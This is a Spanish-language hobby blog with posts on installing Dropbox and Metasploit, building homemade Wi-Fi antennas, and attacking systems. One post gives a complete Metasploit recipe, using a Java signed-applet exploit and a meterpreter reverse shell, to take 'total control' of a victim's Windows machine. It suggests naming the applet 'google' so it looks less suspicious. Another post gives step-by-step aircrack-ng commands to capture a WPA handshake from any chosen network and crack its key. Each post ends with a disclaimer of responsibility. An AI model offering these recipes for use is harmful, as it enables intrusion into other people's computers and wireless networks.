Dropbox

Os voy a hablar de dropbox, es una herramienta que últimamente se está poniendo muy de moda en universidades españolas, aunque ya lleva bastante tiempo, y muchos ya lo conocíamos, pondré el método para instalarlo.

En una terminal ponemos:

sudo apt-get install dropbox

Yo sinceramente prefiero descargarlo desde la página oficial, porque no me da tanto follón, de que si no es la última versión y cosas similares, así además, con este enlace ganáis espacio adicional gratis! Así salimos todos ganando :).

https://db.tt/LeXLLthF

Un saludo.

Metasploit

Bien aquí os explicaré como usar metasploit.

Lo primero de todo abrimos una terminal y ponemos:

sudo msfconsole

Este programa usa exploits, así que los usaremos para acceder a la victima, que en este caso, seremos nosotros a modo de prueba, si teneis otro ordenador lo podréis usar, o sino con una máquina virtual.

Comencemos, el exploit es el siguiente:

use exploit/multi/browser/java_signed_applet

Ahora estamos usando ese exploit, que está presente en muchas aplicaciones web.

Nombraremos el applet, escribiendo:

set APPLETNAME google

El nombre del applet puede ser cualquier otro, pero si ponéis este nombre será menos sospechoso.

Ahora crearemos el servidor al que se conectará la víctima, que es nuestra dirección IP.

Para saber nuestra IP, abrimos otra terminal y escribimos:

sudo ifconfig

Yo estoy conectado a wlan0, así que mi IP es 192.168.1.41

Volvemos a la terminal del metasploit, y escribimos:

set SRVHOST 192.168.1.41

Ahora escribimos el puerto:

set SRVPORT 80

La ruta:

set URIPATH /

Ahora cargamos el payload:

set payload windows/meterpreter/reverse_tcp

Ponemos el host local, nuestra IP:

set LHOST 192.168.1.41

Ahora lanzamos el exploit:

exploit

Y listo, en el otro ordenador o en la maquina virtual, escribid la dirección IP en vuestro navegador, y ya tendréis control total. Os saldrá java preguntándoos si queréis ejecutar.

Y seguidamente os saldrá este mensaje si todo ha salido bien:

Meterpreter opened in session 1 O algo similar, y lo que tenéis que hacer es escribir:

sessions -i 1

O el número de sesión que os indique meterpreter, una vez aquí ya podéis trastear el ordenador, son comandos de windows básicos.

shutdown, reboot, regshot....

Y muchos otros, tenéis todas las opciones en el programa, es ir trasteando un poco, hasta que os aclaréis.

Esto lo he aprendido, viendo diversas páginas webs, videos y demás. No me responsabilizo del uso que le déis.

Instalación Metasploit

Primero de todo Feliz Año 2013!!

Bueno, pues os voy a presentar un programita, que lo encuentro bastante útil, se trata de Metasploit, es un programa que contiene "exploits". Los exploits son como aplicaciones que nos ayudarán a hacer una serie de cosas la mar de interesantes.

Lo primero de todo es descargarnos el programa de su página web:

http://www.metasploit.com/download/

Nos descargamos nuestra versión y instalamos.

Lo instalamos mediante la terminal. El nombre del archivo que yo descargué era así:

metasploit-latest-linux-x64-installer.run 

Por tanto en la terminal escribimos:

Luego lo instalamos:

sudo ./metasploit-latest-linux-x64-installer.run 

Esperamos unos instantes a que se instale, y luego nos preguntará que si queremos hacer un directorio para el programa, contestamos que SI, y luego actualizará de internet, contestamos SI otra vez.

Luego nos tendremos que registrar, es gratuito así que no pasa nada.

Antes de empezar a manejarlo tendremos que instalar unas librerias, si no las tenéis ya instaladas.

sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby

irb ri rubygems subversion build-essential ruby-dev libpcap-dev

Y listo ya lo tendremos instalado y listo para funcionar, comprobamos que todo esta bien:

sudo msfconsole

Tardará un poco al principio así que tranquilos.

 

Comandos equivalentes

	Windows	Ubuntu
Internet	ipconfig	iwconfig
Exploración	cd ubicación	cd ubicación
Eliminar	del nombrearchivo	rm nombrearchivo
Copiar	copy nombrearchivo	cp nombrearchivo

Antenas Caseras

Hola a todos de nuevo, después de tanto sin escribir buscando más ideas que poder poner en el blog pensé en una nueva que anda circulando por internet, por seguridadwireless, una de la web más conocida con respecto a este tema. Pues en este post comentaré el aspecto de las antenas "caseras" aquellas que podemos construir con materiales que son baratos y fáciles de conseguir o que tengamos por casa. Lo que conseguiremos con estas antenas será ampliar la señal de nuestro receptor usb wifi.

Antena doble pringles

La primera de todas es la más famosa por su simplicidad.

Se llama la cantenna, o como la llamo yo el torpedo pringles. Cada uno a su gusto, consiste en juntar dos latas de pringles grandes.

Este sería el resultado final.

Ahora procederé a explicar lo que necesitamos:

-2 latas de pringles 165g
-Cinta aislante
-Tijeras
-16 Arandelas pequeñas (3mm diametro interior)
-32 Arandelas grandes (6mm diametro interior)
-32 Tuercas (3mm diametro interior)
-Una barra roscada (50cm longitud 3mm diámetro)

*Excepeción: Puedes añadirle al final del todo dos discos recubiertos con cinta de aluminio o papel de aluminio, mejor la cinta. En caso de que lo añadas:
-Cinta de aluminio
-Dos discos que no sirvan, uno se recortara mas o menos por la mitad.


Primero de todo cogemos la barra roscada de 50 cm, y marcamos con un permanente cada 3 cm, para guiarnos y poner las arandelas.
Luego recortaremos dos circulos, uno de carton, cartulina, de las cajas de cereales por ejemplo, y lo ponemos como base, y el otro de plastico, de una de las tapas de las latas.
Cuando hayamos colocado 6 arandelas grandes, es decir a la séptima ponemos el circulo de plástico, luego ya seguimos colocando hasta otras 6, y en la sexta ponemos la tapa SIN RECORTAR de la lata para poder cerrar bien nuestra antena. 

*Los discos ya si queréis colocarlos es primero uno entero y luego el recortado, con el mismo criterio que siempre, yo lo que hice para que cerrara bien fue colocarles dos arandelas grandes pegandolas al disco y asi no se movían.

Falta hacer un pequeño agujero mas o menos cerca de donde se encuentre la base para meter el pincho usb y que no llegue a tocar la barra metalica, solo rozarla.

Antena escurridor de aceite.

Para mí esta es la mejor y con la que mejores resultados he obtenido. Y es la más sencilla de hacer.

Materiales:

-Colador

-Rosca y 2 tuercas de manguera de jardín

-Cable usb macho-hembra

De diametro mide 30 cm.

Hay que agujerear el centro del colador

Partimos por la mitad la rosca para meter el cable y lo ponemos en el agujero del colador.

Metemos con cuidado las tuercas y dejamos que el extremo de cable hembra sobresalga un poco pero sin llegar a pasarla y enroscamos bien para que se quede fijo. La otra rosca tiene qe pasar entera.

NUEVO UBUNTU

Bueno Ubuntu 12.04 ya esta aquí, a partir d ahora hablaré de la nueva versión de esta distribución.

Sacar WPA Ubuntu

Bueno ya hice en su día una etrada donde explicaba como sacar la WEP de una red, en este post me encargaré de explicaros como sacar una WPA-PSK, tiene que ser PSK, el por qué, pues muy sencillo las PSK, significa Pre-shared-key, osea "clave compartida" ya que las puedes sacar mediante fuerza bruta o un diccionario


Mejor que las saques por diccionario, tienes muchas aplicaciones en ubuntu para crear diccionarios como crunch, wpamagickey...


Bueno comencemos:


sudo airmon-ng start wlan0
sudo airodump-ng mon0
Eliges la red que más te guste con WPA-PSK y te fijas en la MAC, y el canal y guardas con un nombre:


sudo airodump-ng --bssid 11:22:33:44:55:66 -c numero -w captura mon0
Comenzará a escanear esa red, y tiene que haber alguien conectado sino no servirá de nada.
El cliente se llamará -c.
En otra pestaña escribimos:


sudo aireplay-ng -1 10 -b 11:22:33:44:55:66 -c DD:FF:GG:JJ:GG:TT -h TUMAC mon0


Cuando consiga el handshake, ya tendrmos la información, solo tienes que usar el diccionario y listo:


sudo aircrack-ng captura-01.cap -w rutadiccionario


Y ya está si tenemos un buen diccionario sacará dicha clave.




No me responsabilizo de lo que se haga con este tutorial.